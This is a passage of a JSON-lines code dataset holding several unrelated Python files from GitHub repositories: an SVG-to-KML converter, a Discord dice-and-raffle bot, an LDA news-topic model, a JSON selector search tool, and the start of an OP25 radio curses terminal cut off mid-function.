used_pairs.add((first_sample, second_sample))\n used_pairs.add((second_sample, first_sample))\n if counter < max_samples:\n print(f'{counter} samples from {max_samples} are built.')\n else:\n print(f'All {max_samples} samples are built.')\n del X\n X = (\n X_left_tokens[:counter],\n X_left_masks[:counter],\n X_right_tokens[:counter],\n X_right_masks[:counter]\n )\n return X, y[:counter]\n","repo_name":"bond005/runne_contrastive_ner","sub_path":"trainset_building/trainset_building.py","file_name":"trainset_building.py","file_ext":"py","file_size_in_byte":12156,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"45"} +{"seq_id":"18991966120","text":"import os\nfrom xml.dom import minidom\nfrom svg.path import parse_path\nimport matplotlib.pyplot as plt\nfrom shapely.geometry import Polygon\nfrom svgpathtools import Path\nimport geopandas as gpd\nfrom operator import itemgetter\nfrom kmlfaster import create_kml\n\n\ndef find_svg():\n svg_strings = []\n for file in os.listdir(\".\\\\input\"):\n if file.endswith(\".svg\"):\n print(os.path.join(\"\\\\input\", file))\n svg_strings.append(os.path.join(\"\\\\input\", file))\n return svg_strings\n\n\ndef get_rectangles(svg_doc):\n polygon_with_id = []\n polygons = []\n for irect, rect in enumerate(svg_doc.getElementsByTagName('rect')):\n x0 = float(rect.getAttribute('x'))\n y0 = float(rect.getAttribute('y'))\n id = rect.getAttribute('id')\n width = float(rect.getAttribute('width'))\n height = float(rect.getAttribute('height'))\n polygon = Polygon([(x0, y0),\n (x0 + width, y0),\n (x0 + width, y0 + height),\n (x0, y0 
+ height)\n ])\n polygons.append(polygon)\n polygon_with_id.append({\"id\": id, \"geometries\": polygon})\n return polygons, polygon_with_id\n\n\ndef get_paths(svg_doc):\n all_paths = []\n for ipath, path in enumerate(svg_doc.getElementsByTagName('path')):\n print('Path', ipath)\n d = path.getAttribute('d')\n id = path.getAttribute('id')\n print(id)\n parsed = parse_path(d)\n print('Objects:\\n', parsed, '\\n' + '-' * 20)\n circle_path = []\n for obj in parsed:\n bezier_path = Path(obj)\n num_samples = 10\n for i in range(num_samples):\n if i > 0:\n bezier = (bezier_path.point(i / (num_samples - 1)))\n if bezier is not None:\n circle_path.append(bezier)\n all_paths.append({\"id\": id, \"geometries\": circle_path})\n return all_paths\n\n\ndef attach_paths_to_polygon(whole_path, polygons):\n all_geometries = []\n for each_path in whole_path:\n circle = []\n for complex_num in each_path['geometries']:\n imaginary = complex_num.imag\n real = complex_num.real\n point = [float(real), float(imaginary)]\n circle.append(point)\n try:\n polygono = Polygon(circle)\n polygons.append({\"id\": each_path['id'], \"geometries\": polygono})\n all_geometries.append({\"id\": each_path['id'], \"geometries\": polygono})\n except:\n print(\"An exception occurred\")\n return polygons\n\n\ndef show_coords(polygons, factor):\n for polygon in polygons:\n x, y = polygon['geometries'].exterior.xy\n x_float = [float(line) for line in x]\n y_float = [float(line) for line in y]\n plt.plot(x_float, y_float, c=\"black\", linewidth=0.5)\n plt.xlim([0, 4 * 1000 / factor])\n plt.ylim([-4 * 1000 / factor, 0])\n return plt.show()\n\n\ndef determine_min(shape):\n test_list = []\n for each in shape:\n print(each['geometries'])\n test_list.append(each['geometries'])\n gpdf = gpd.GeoDataFrame(columns=['id', 'distance', 'feature'], geometry=[*test_list])\n bounds = gpdf.geometry.apply(lambda x: x.bounds).tolist()\n min_x, min_y, max_x, max_y = min(bounds, key=itemgetter(0))[0], min(bounds, key=itemgetter(1))[1], \\\n max(bounds, key=itemgetter(2))[2], max(bounds, key=itemgetter(3))[\n 3]\n print('This is the min tupel')\n print(min_x, min_y, max_x, max_y)\n return min_x, min_y, max_x, max_y\n\n\ndef shift_to_root(shape, diff_x, diff_y):\n all_geometries = []\n for i, polygons in enumerate(shape):\n xx, yy = polygons['geometries'].exterior.coords.xy\n x = xx.tolist()\n new_x = [each_x - diff_x for each_x in x]\n y = yy.tolist()\n new_y = [each_y - diff_y for each_y in y]\n poly = Polygon(zip(new_x, new_y))\n all_geometries.append({\"id\": polygons['id'], \"geometries\": poly})\n return all_geometries\n\n\ndef resize_polygons(list_of_poly, factor):\n all_geometries = []\n for i, polygons in enumerate(list_of_poly):\n xx, yy = polygons['geometries'].exterior.coords.xy\n x = xx.tolist()\n new_x = [each_x / factor for each_x in x]\n y = yy.tolist()\n new_y = [each_y / - factor for each_y in y]\n poly = Polygon(zip(new_x, new_y))\n all_geometries.append({\"id\": polygons['id'], \"geometries\": poly})\n return all_geometries\n\n\ndef get_working_dir():\n print(os.getcwd())\n path_to_wdir = os.getcwd()\n return path_to_wdir\n\n\ndef get_pixels(svg_doc):\n width = float(0)\n height = float(0)\n for isvg, svg in enumerate(svg_doc.getElementsByTagName('svg')):\n if isvg == 0:\n width = float(svg.getAttribute('width'))\n height = float(svg.getAttribute('height'))\n return width, height\n\n\ndef make_qlik_script(width, height, fac):\n script_string = f\"\"\"\nLet vScale = {fac};\nLet Breite = {width};\nLet Höhe = {height};\n\nLet Unten_Breite = 
-$(Höhe)/$(vScale);\nLet Links_Laenge = $(Breite)/$(vScale);\n\nLet vScale;\nLet Breite;\nLet Höhe;\n\"\"\"\n return script_string\n\n\ndef make_new_qlik_script():\n script_string = f\"\"\"\nmodified_1:\nLoad\n\tName,\n\tSubfield(Area, '],[')\t\t\t\t\t\t\t\tas all_coordinates\nResident [doc name/name2];\n\nmodified_2:\nLoad\n\tName,\n PurgeChar(Subfield(all_coordinates, ',', 1), '[')\tas x_Wert,\n PurgeChar(Subfield(all_coordinates, ',', 2), ']')\tas y_Wert\nResident modified_1;\n\nmax_min_table:\nLoad\n\tmax(replaced_x_Wert)\t\t\t\t\t\t\t\tas max_x_Wert,\n max(replaced_y_Wert)\t\t\t\t\t\t\t\tas max_y_Wert,\n min(replaced_x_Wert)\t\t\t\t\t\t\t\tas min_x_Wert,\n min(replaced_y_Wert)\t\t\t\t\t\t\t\tas min_y_Wert;\nLoad\n\tReplace(x_Wert, '.', ',')\t\t\t\t\t\t\tas replaced_x_Wert,\n Replace(y_Wert, '.', ',')\t\t\t\t\t\t\tas replaced_y_Wert\nResident modified_2;\n\nDrop Table modified_1;\n\n\nLet Oben_Breite = Peek('max_y_Wert', 0, 'max_min_table');\nLet Links_Laenge = Peek('min_x_Wert', 0, 'max_min_table');\nLet Unten_Breite = Peek('min_y_Wert', 0, 'max_min_table');\nLet Rechts_Laenge = Peek('max_x_Wert', 0, 'max_min_table');\n\"\"\"\n return script_string\n\n\n\"\"\"define factor\"\"\"\nfac = 1\n\ncwd = get_working_dir()\nos.environ['PROJ_LIB'] = f\"{cwd}\\\\venv\\\\Lib\\\\site-packages\\\\pyproj\\\\proj_dir\\\\share\\\\proj\"\nimport fiona\n\nall_svgs = find_svg()\n\nfiona.drvsupport.supported_drivers['LIBKML'] = 'rw'\n\nfor each in all_svgs:\n output_file_name = each[6:len(each)-4]\n doc = minidom.parse(f'.{each}')\n poly, polygon_with_id = get_rectangles(doc)\n new_added_path = get_paths(doc)\n pixels_width, pixels_height = get_pixels(doc)\n doc.unlink()\n new_poly = attach_paths_to_polygon(new_added_path, polygon_with_id)\n resized_poly = resize_polygons(new_poly, fac)\n minx, miny, maxx, maxy = determine_min(resized_poly)\n # new_polygons = shift_to_root(resized_poly, minx, maxy)\n new_polygons = resized_poly\n # insert_qlik_string = make_qlik_script(pixels_width, pixels_height, fac)\n insert_qlik_string = make_new_qlik_script()\n print(insert_qlik_string)\n # panda = gpd.GeoDataFrame(columns=['id', 'meta_x', 'meta_y'], geometry=[*new_polygons])\n # panda.to_file(f'.\\\\output{output_file_name}.kml', driver='LIBKML')\n # panda.to_file(f'.\\\\output{output_file_name}.geojson', driver=\"GeoJSON\")\n kml, kml_string = create_kml(new_polygons)\n with open(f'./output/{output_file_name}.kml', 'w') as f:\n f.write(kml_string)\n\nshow_coords(new_polygons, fac)\n","repo_name":"leitartuser/svg_to_kml","sub_path":"svg_to_kml.py","file_name":"svg_to_kml.py","file_ext":"py","file_size_in_byte":7522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"43438834068","text":"# bot.py\nimport os\nimport discord\nfrom dotenv import load_dotenv\nimport asyncio\nimport random\nfrom logs import record\nfrom permissions import permission_level, add_user, get_info, change_permission, find_id_by_name\nfrom encryption import encrypt, decrypt\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\nclient = discord.Client()\n\nversion = \"0.1\"\n\nclass Data:\n def __init__(self):\n self.event_active = False\n self.event_name = \"\"\n self.util_list = []\n \n \n@client.event\nasync def on_ready():\n print(f'{client.user} has connected to Discord!')\n\n\n@client.event\nasync def on_message(message):\n '''\n This function handles all messages sent by users. 
\n First, the users permissions are determined.\n Next, the list of commands are run through and matched to the sent message.\n '''\n \n # We want to ignore messages sent by the bot itself.\n if message.author == client.user:\n return\n \n # Here the permissions of the user are determined. -1 indicates the user does not exist. \n level = permission_level(message.author.id)\n\n #If user does not exist, add them to permissions file\n if(level == -1):\n add_user({'name':message.author.name, 'level':0, 'id':message.author.id})\n \n # Following are all the commands.\n if message.content == '!version':\n await message.channel.send(version)\n return\n \n if message.content.startswith('!roll', 0, 5):\n min = 0\n max = 0\n if len(message.content) == 5:\n min = 0\n max = 100\n else: \n try:\n i = 6\n min_str = '' \n while(message.content[i] != ' '):\n min_str = min_str + message.content[i]\n i = i + 1\n \n max_str = message.content[i+1:]\n min = int(min_str)\n max = int(max_str)\n except:\n await message.channel.send('Roll Error, invalid min and max')\n return \n \n rand = random.randint(min, max)\n await message.channel.send(str(rand))\n record('roll by ' + message.author.name + '. Result = ' + str(rand))\n return\n \n if message.content.startswith('!raffle', 0, 7):\n try:\n print(message.content[8:])\n roll_time = int(message.content[8:])\n except:\n await message.channel.send('Raffle Error, invalid input time')\n return\n record(\"Raffle called with length of \" + str(roll_time))\n await message.channel.send('Raffle started! Apply with !apply. Raffle ends in ' + str(roll_time) + ' seconds')\n bot_data.event_name = \"raffle\"\n bot_data.event_active = True\n util_list = []\n await asyncio.sleep(roll_time)\n bot_data.event_name = \"\"\n bot_data.event_active = False\n util_list = []\n \n if(len(bot_data.util_list) == 0):\n await message.channel.send('Raffle closed due to lack of applicants')\n record(\"Raffle failed, lack of applicants\")\n else:\n choice = random.choice(bot_data.util_list)\n await message.channel.send('Raffle finished, congratulations ' + choice + '!')\n record(\"Raffle finished: winner = \" + choice)\n \n if message.content == \"!apply\" and bot_data.event_active == True and bot_data.event_name == \"raffle\":\n print(message.author.name + ' applied to raffle.')\n if(not message.author.name in bot_data.util_list):\n bot_data.util_list.append(message.author.name)\n \n if message.content.startswith('!perm', 0, 5) and level >= 1:\n try:\n l = 0\n search_name = ''\n if(len(message.content) != 5):\n search_name = message.content[6:]\n l = permission_level(find_id_by_name(search_name))\n else:\n search_name = message.author.name\n l = level \n if l == 2:\n await message.channel.send(search_name + ' is an admin')\n if l == 1:\n await message.channel.send(search_name + ' is a moderator')\n if l == 0:\n await message.channel.send(search_name + ' is a user')\n if l == -1:\n await message.channel.send(search_name + ' does not exist')\n except:\n print(\"search for permissions failed\")\n \n if message.content.startswith('!setPermissions', 0, 15) and level >= 1:\n try:\n search_name = ''\n i = 16\n while(message.content[i] != ' '):\n search_name = search_name + message.content[i] \n i = i + 1\n perms_arg = int(message.content[i+1:])\n if((perms_arg == 0 or perms_arg == 1 or perms_arg == 2) and level >= perms_arg):\n temp_dict = get_info(find_id_by_name(search_name))\n old_level = temp_dict['level']\n temp_dict['level'] = perms_arg\n change_permission(temp_dict)\n record(search_name + \" 
permission level changed from \" + str(old_level) + \" to \" + str(perms_arg))\n \n except:\n print(\"Changing permissions failed\")\n \n \nbot_data = Data()\nclient.run(TOKEN)\n\n","repo_name":"Oli-26/DiscordBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":5401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"70914232136","text":"''' epoch_test.py '''\nfrom src.train import train\n\nclass TestRNN:\n\n @staticmethod\n def test_one_epoch():\n val_loss = train(['--epoch=1', '--name=TEST'])\n assert round(val_loss, 7) == 1.6869721\n\n @staticmethod\n def test_epoch_resume():\n _ = train(['--epoch=2', '--name=TEST'])\n val_loss_end = train(['--epoch=2', '--checkpoint=TEST'])\n\n val_loss_test = train(['--epoch=4'])\n\n assert val_loss_test == val_loss_end\n","repo_name":"TylerYep/self-driving","sub_path":"unit_test/epoch_test.py","file_name":"epoch_test.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"36372795865","text":"import requests\n\nurl = \"https://api.ihansen.org/img/detail?page=0&perPage=9&index&orderBy=likes&favorites&tag=night\"\n\npayload={}\nheaders = {\n 'Cookie': 'userid=7b3d3d90a473456ebac473c28ce1d1e3'\n}\n\nresponse = requests.request(\"GET\", url, headers=headers, data=payload)\n\nprint(response.text)","repo_name":"zhangqinning/getWallpaper","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"42078111014","text":"def solution(brown, yellow):\n answer = []\n yellow_x, yellow_y = 0, 0\n\n for i in range(1, yellow + 1):\n if yellow % i == 0:\n yellow_x = yellow // i\n yellow_y = i\n\n if 2 * yellow_x + 2 * yellow_y + 4 == brown:\n answer.append(yellow_x + 2)\n answer.append(yellow_y + 2)\n break\n\n # answer리스트 내림차순 정렬\n return sorted(answer, reverse=True)","repo_name":"ChaeyeonHan/python-algorithm","sub_path":"programmers/카펫.py","file_name":"카펫.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"9907478267","text":"import xml.sax\nimport logging\nfrom pprint import pprint\nfrom gensim import corpora, models, similarities\nimport jieba\nimport codecs\nimport os\nimport pickle\n\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\n#all_titles = []\n#all_files = []\n\nclass NewsHandler(xml.sax.ContentHandler):\n def __init__(self, all_files, all_titles):\n self.all_files = all_files\n self.all_titles = all_titles\n self.cur_tag = \"\"\n self.title = \"\"\n\n def startElement(self, tag, attributes):\n self.cur_tag = tag\n #print(\"<\" + tag + \">\")\n \n def endElement(self, tag):\n if tag == \"content\":\n self.cur_tag = \"\"\n self.title = \"\"\n #print(\"\")\n\n def characters(self, txt):\n txt = txt.strip()\n if len(txt) == 0: # 跳过内容为空的文章\n return\n\n # 只需要文章标题和文章内容\n if self.cur_tag == \"contenttitle\":\n self.title = txt\n elif self.cur_tag == \"content\":\n if self.title == \"\":\n return\n\n # 标题和内容必须同时添加,保持对应列表长度一致\n self.all_titles.append(self.title)\n self.all_files.append(txt)\n\n \nclass NewsCorpus(object):\n def __init__(self, filename=None, stopwords=None):\n self.dictionary = None\n self.corpus = None\n self.all_files = []\n self.all_titles = []\n\n if filename != None:\n 
self.parseXML(filename)\n stoplist = None\n if stopwords != None:\n f = codecs.open(stopwords, 'r', encoding='utf8')\n stoplist = f.read().split()\n f.close()\n\n self.bowCorpus(stoplist)\n\n def __iter__(self):\n for text in self.corpus:\n yield text\n\n def __len__(self):\n print(\"__len__() call!\", len(self.corpus))\n return len(self.corpus)\n\n def __getitem__(self, key):\n print(\"!!! __getitem__() called!!!, key=\", key)\n\n def parseXML(self, xmlfile, encoding='utf8'):\n f = codecs.open(xmlfile, 'r', encoding)\n xml.sax.parseString(f.read().replace('&', '&'), NewsHandler(self.all_files, self.all_titles))\n\n def bowCorpus(self, stoplist=None):\n for i in range(len(self.all_files)):\n afile = list(jieba.cut(self.all_files[i]))\n filtered = [x for x in afile if x not in stoplist]\n self.all_files[i] = filtered\n\n self.dictionary = corpora.Dictionary(self.all_files)\n self.corpus = [self.dictionary.doc2bow(text) for text in self.all_files]\n\n def save(self):\n if self.dictionary != None and self.corpus != None:\n self.dictionary.save('my_corpus.dict')\n corpora.MmCorpus.serialize('my_corpus.mm', self.corpus)\n f = open('my_corpus.titles', 'wb')\n pickle.dump(self.all_titles, f)\n f.close()\n\n def load(self):\n dict_file = 'my_corpus.dict'\n mm_file = 'my_corpus.mm'\n title_file = 'my_corpus.titles'\n if os.path.exists(dict_file) and os.path.exists(mm_file) and os.path.exists(title_file):\n self.dictionary = corpora.Dictionary.load(dict_file)\n self.corpus = corpora.MmCorpus(mm_file)\n f = open(title_file, 'rb')\n self.all_titles = pickle.load(f)\n f.close()\n else:\n print('**error**: dict or corpus file NOT found!')\n\n\n#mycorpus = NewsCorpus(\"news_tensite_xml.dat\", \"stopwords.txt\")\n#mycorpus.save()\nmycorpus = NewsCorpus()\nmycorpus.load()\n\n#print(mycorpus.dictionary)\n#print(mycorpus.corpus)\n#print(mycorpus.all_titles)\nprint(\"all titles len:\", len(mycorpus.all_titles))\n\nprint(\"!!parse() ok.\")\n\n#for id, afile in enumerate(mycorpus):\n #print(id, afile)\n\nprint(\"length of mycorpus:\", len(mycorpus))\n\ntfidf = models.TfidfModel(mycorpus)\nprint(tfidf)\ntfidf_corpus = tfidf[mycorpus]\n\nprint(\"begin lda training\")\n\nlda = models.LdaModel(tfidf_corpus, id2word=mycorpus.dictionary, num_topics=20)\n#lda = models.LdaModel(tfidf_corpus, num_topics=10)\nprint()\nprint('-------------------------------------')\nlda.print_topics()\nprint()\nprint('======================================')\nlda_corpus = lda[tfidf_corpus]\ncorpora.MmCorpus.serialize('lda_corpus.mm', lda_corpus)\n#for topic in topic_test:\n #print(topic)\n","repo_name":"kent-wong/NLP","sub_path":"news_topics.py","file_name":"news_topics.py","file_ext":"py","file_size_in_byte":4386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"25693299412","text":"\"\"\"\nCreate README.md file\n\nUsage:\n python print_markdown.py\n\n\"\"\"\nimport subprocess\nimport pytz\n\nfrom itertools import groupby\nfrom datetime import datetime\n\nfrom file_utils import Quiz, create_node, create_quizzes, get_valid_path\n\nPATH_LIST = sorted(get_valid_path(\".\"))\nNODE_LIST = [create_node(p) for p in PATH_LIST]\nQUIZ_LIST = sorted(\n create_quizzes(NODE_LIST), key=lambda q: (q.year, q.month, q.subject))\n\nMARKDOWN_HEADER = \"\"\"\n
    \n\"Logo\"\n
    \n\n# R Korea Weekly Quiz\n![Generate README](https://github.com/R-Korea/weekly_R_quiz/workflows/Generate%20README/badge.svg)\n\nR Korea에서 진행한 주말맞이 R Quiz 모음입니다.\n\"\"\"\n\nSEOUL_TZ = pytz.timezone(\"Asia/Seoul\")\n# For example, it would render \"2020-07-24 11:08:35 (Asia/Seoul)\".\nNOW = datetime.now().astimezone(SEOUL_TZ).strftime(\"%Y-%m-%d %H:%M:%S (Asia/Seoul)\")\n\nMARKDOWN_FOOTER = f\"\"\"\n## NOTES\n이 파일은 {NOW} 자동으로 생성되었습니다.\n\n## 생성 방법\n### Python\n\n```shell\npipenv install # install dependencies\npipenv run python utils/print_markdown.py\n```\n\"\"\"\n\n\ndef print_year(year: int) -> str:\n \"\"\"Returns `year` in markdown format\"\"\"\n return f\"## {year} 년\"\n\n\ndef print_month(month: int) -> str:\n \"\"\"Returns `month` in markdown format\"\"\"\n return f\"### {month} 월\"\n\n\ndef print_image(quiz: Quiz) -> str:\n \"\"\"Returns \"\"\"\n if not quiz.image_path:\n return \"\"\n\n template = f\"\"\"\n
    \n \"Quiz\n
    \n\"\"\"\n return template\n\n\ndef print_question(quiz: Quiz) -> str:\n \"\"\"Returns a link to the question in markdown format\"\"\"\n template = f\"[{quiz.subject}]({quiz.quiz_path})\"\n return template\n\n\ndef print_answer(quiz: Quiz) -> str:\n \"\"\"Returns a link to the question answer\"\"\"\n if not quiz.answer_path:\n return \"\"\n\n template = f\"\"\"
    정답 보기\"\"\"\n return template\n\n\ndef print_quiz(quiz: Quiz) -> str:\n \"\"\"Returns a quiz in markdown format\"\"\"\n subject = quiz.subject\n\n link = f\"\"\"\n문제 바로 가기\n\"\"\"\n\n with open(quiz.quiz_path, \"r\") as f:\n question = f.readline().strip()\n\n image_tag = print_image(quiz)\n answer_tag = print_answer(quiz)\n\n template = f\"\"\"
    {subject}\n {link}\n
    {question}
    \n {image_tag}\n{answer_tag}\n
    \n\"\"\"\n\n return template\n\n\ndef get_markdown() -> str:\n \"\"\"Returns a complete markdown\"\"\"\n md_buffer = \"\"\n\n for year, y_group in groupby(QUIZ_LIST, key=lambda q: q.year):\n\n md_buffer += print_year(year) + \"\\n\"\n for month, group in groupby(y_group, key=lambda q: q.month):\n\n md_buffer += print_month(month) + \"\\n\"\n\n for node in group:\n md_buffer += print_quiz(node) + \"\\n\"\n\n return md_buffer\n\n\ndef clean_toc(toc: str) -> str:\n \"\"\"Each line in `toc` has 6 unnecessary spaces, so get rid of them\"\"\"\n lines = toc.splitlines()\n return \"\\n\".join(line[6:] for line in lines)\n\n\ndef main():\n \"\"\"Main Function\"\"\"\n buffer = get_markdown()\n result = subprocess.run(\n [\"./utils/gh-md-toc\", \"-\", \"$0\"],\n stdout=subprocess.PIPE,\n input=buffer.encode(\"utf-8\"))\n\n toc = result.stdout.decode('utf-8')\n toc = clean_toc(toc)\n\n markdown = f\"\"\"{MARKDOWN_HEADER}\n\nTable of Contents\n=======================\n\n{toc}\n\n{buffer}\n\n{MARKDOWN_FOOTER}\n\"\"\"\n\n with open(\"README.md\", \"w\") as f:\n f.write(markdown)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"R-Korea/weekly_R_quiz","sub_path":"utils/print_markdown.py","file_name":"print_markdown.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"45"} +{"seq_id":"20607133496","text":"import json\nimport sys\nimport os\n\nsys_arg = sys.argv[1]\n\ndef retrieve_values(obj, key):\n array = []\n search_val = key\n def retrieve(obj, key):\n if isinstance(obj, dict):\n for key, val in obj.items():\n if isinstance(val, (dict, list)):\n retrieve(val, key)\n elif val == search_val:\n print(json.dumps(obj, indent=4) + '\\n')\n array.append(val)\n elif isinstance(obj, list):\n for item in obj:\n retrieve(item, key)\n #print(obj, '\\n')\n return array\n results = retrieve(obj, key)\n\n if len(array) == 0: \n print(\"Dead End! 
Maybe an invalid selector.\")\n return results\n\ndef retrieve_file(obj):\n json_file_path = obj \n with open(json_file_path, 'r') as json_file:\n data = json.load(json_file)\n return data\n\ndef search():\n selector = input(\"Input CSS3 selector: \")\n \n if not selector[0].isalpha():\n updated_sel = selector[:0] + '' + selector[1:]\n else:\n updated_sel = selector\n\n complete_path = os.path.abspath(sys_arg)\n json_file = retrieve_file(complete_path)\n retrieve_values(json_file, updated_sel)\n\ndef main():\n if len(sys.argv) == 2:\n try: \n input_file = open(sys_arg, 'r')\n file_content = input_file.read()\n print(\"Fetching file...\")\n print(file_content)\n print(\"Ready!\")\n search()\n except Exception as e: \n print(\"ERROR:\", e) \nmain() ","repo_name":"thesliceline/Cantina","sub_path":"JSONParser.py","file_name":"JSONParser.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"72794566216","text":"\"true\" '''\\'\nDEFAULT_PYTHON2=/usr/bin/python\nDEFAULT_PYTHON3=/usr/bin/python3\nif [ -f op25_python ]; then\n OP25_PYTHON=$(cat op25_python)\nelse\n OP25_PYTHON=\"/usr/bin/python\"\nfi\n\nif [ -x $OP25_PYTHON ]; then\n echo Using Python $OP25_PYTHON >&2\n exec $OP25_PYTHON \"$0\" \"$@\"\nelif [ -x $DEFAULT_PYTHON2 ]; then\n echo Using Python $DEFAULT_PYTHON2 >&2\n exec $DEFAULT_PYTHON2 \"$0\" \"$@\"\nelif [ -x $DEFAULT_PYTHON3 ]; then\n echo Using Python $DEFAULT_PYTHON3 >&2\n exec $DEFAULT_PYTHON3 \"$0\" \"$@\"\nelse\n echo Unable to find Python >&2\nfi\nexit 127\n'''\nimport sys\nimport curses\nimport curses.textpad\nimport time\nimport json\nimport threading\nimport traceback\nimport socket\n\nfrom gnuradio import gr\n\nKEEPALIVE_TIME = 3.0 # no data received in (seconds)\n\nclass q_watcher(threading.Thread):\n def __init__(self, msgq, callback, **kwds):\n threading.Thread.__init__ (self, **kwds)\n self.setDaemon(1)\n self.msgq = msgq\n self.callback = callback\n self.keep_running = True\n self.start()\n\n def run(self):\n while(self.keep_running):\n if not self.msgq.empty_p():\n msg = self.msgq.delete_head()\n if msg is not None:\n self.callback(msg)\n else:\n self.keep_running = False\n else:\n time.sleep(0.1)\n\nclass curses_terminal(threading.Thread):\n def __init__(self, input_q, output_q, sock=None, **kwds):\n threading.Thread.__init__ (self, **kwds)\n self.setDaemon(1)\n self.input_q = input_q\n self.output_q = output_q\n self.keep_running = True\n self.last_update = 0\n self.auto_update = True\n self.current_nac = None\n self.current_sysname = None\n self.current_srcaddr = 0\n self.current_encrypted = 0\n self.current_msgqid = '0'\n self.channel_list = []\n self.default_channel = None\n self.capture_active = False\n self.hold_tgid = 0\n self.maxx = 0\n self.maxy = 0\n self.sock = sock\n self.sm_step = 100\n self.lg_step = 1200\n self.send_command('get_terminal_config', 0, 0)\n self.start()\n\n def get_terminal_type(self):\n return \"curses\"\n\n def setup_curses(self):\n self.stdscr = curses.initscr()\n self.stdscr.keypad(1)\n self.maxy, self.maxx = self.stdscr.getmaxyx()\n if (self.maxy < 6) or (self.maxx < 60):\n sys.stderr.write(\"Terminal window too small! Minimum size [70 x 6], actual [%d x %d]\\n\" % (self.maxx, self.maxy))\n sys.stdout.write(\"Terminal window too small! 
Minimum size [70 x 6], actual [%d x %d]\\n\" % (self.maxx, self.maxy))\n self.keep_running = False\n return\n\n curses.noecho()\n curses.halfdelay(1)\n\n self.title_bar = curses.newwin(1, self.maxx, 0, 0)\n self.help_bar = curses.newwin(1, self.maxx, self.maxy-1, 0)\n self.top_bar = curses.newwin(1, self.maxx, 1, 0)\n self.freq_list = curses.newwin(self.maxy-5, self.maxx, 2, 0)\n self.active1 = curses.newwin(1, self.maxx-15, self.maxy-3, 0)\n self.active2 = curses.newwin(1, self.maxx-15, self.maxy-2, 0)\n self.status1 = curses.newwin(1, 15, self.maxy-3, self.maxx-15)\n self.status2 = curses.newwin(1, 15, self.maxy-2, self.maxx-15)\n self.prompt = curses.newwin(1, 10, self.maxy-1, 0)\n self.text_win = curses.newwin(1, 11, self.maxy-1, 10)\n self.textpad = curses.textpad.Textbox(self.text_win)\n self.stdscr.refresh()\n\n self.title_help()\n\n def resize_curses(self):\n self.maxy, self.maxx = self.stdscr.getmaxyx()\n \n if (self.maxx < 60) or (self.maxy < 6): # do not resize if window is now too small\n return \n\n self.stdscr.erase()\n\n self.title_bar.resize(1, self.maxx)\n self.help_bar.resize(1, self.maxx)\n self.help_bar.mvwin(self.maxy-1, 0)\n self.top_bar.resize(1, self.maxx)\n self.freq_list.resize(self.maxy-5, self.maxx)\n self.active1.resize(1, self.maxx-15)\n self.active1.mvwin(self.maxy-3, 0)\n self.active2.resize(1, self.maxx-15)\n self.active2.mvwin(self.maxy-2, 0)\n self.status1.resize(1, 15)\n self.status1.mvwin(self.maxy-3, self.maxx-15)\n self.status2.resize(1, 15)\n self.status2.mvwin(self.maxy-2, self.maxx-15)\n self.stdscr.refresh()\n\n self.title_help()\n\n def end_terminal(self):\n try:\n curses.endwin()\n except:\n pass\n\n def title_help(self):\n if self.capture_active:\n title_str = \"OP25 (symbol capture)\"\n else:\n title_str = \"OP25\"\n help_str = \"(f)req (h)old (s)kip (l)ock (W)list (B)list (q)uit (1-6)plot (,.<>)tune\"\n self.title_bar.erase()\n self.help_bar.erase()\n self.title_bar.addstr(0, 0, title_str.center(self.maxx-1, \" \"), curses.A_REVERSE)\n self.help_bar.addstr(0, 0, help_str.center(self.maxx-1, \" \"), curses.A_REVERSE)\n self.title_bar.refresh()\n self.help_bar.refresh()\n self.stdscr.move(1,0)\n self.stdscr.refresh()\n\n def do_auto_update(self):\n UPDATE_INTERVAL = 0.5 # sec.\n if not self.auto_update:\n return False\n if self.last_update + UPDATE_INTERVAL > time.time():\n return False\n self.last_update = time.time()\n return True\n\n def process_terminal_events(self):\n # return true signifies end of main event loop\n if curses.is_term_resized(self.maxy, self.maxx) is True:\n self.resize_curses()\n\n _ORD_C = ord('c')\n _ORD_S = ord('s')\n _ORD_L = ord('l')\n _ORD_H = ord('h')\n _ORD_R = ord('R')\n COMMANDS = {_ORD_S: 'skip', _ORD_L: 'lockout', _ORD_H: 'hold', _ORD_R: 'reload', _ORD_C: 'capture'}\n c = self.stdscr.getch()\n if c == ord('u') or self.do_auto_update():\n self.send_command('update', 0, int(self.current_msgqid))\n if c in list(COMMANDS.keys()):\n self.send_command(COMMANDS[c], 0, int(self.current_msgqid))\n elif c == ord('q'):\n return True\n elif c == ord('t'):\n if self.current_nac:\n self.send_command('add_default_config', int(self.current_nac), int(self.current_msgqid))\n elif c == ord('f'):\n self.prompt.addstr(0, 0, 'Frequency')\n self.prompt.refresh()\n self.text_win.erase()\n response = self.textpad.edit()\n self.prompt.erase()\n self.prompt.refresh()\n self.text_win.erase()\n self.text_win.refresh()\n self.title_help()\n try:\n freq = float(response)\n if freq < 10000:\n freq *= 1000000.0\n except:\n freq = None\n if 
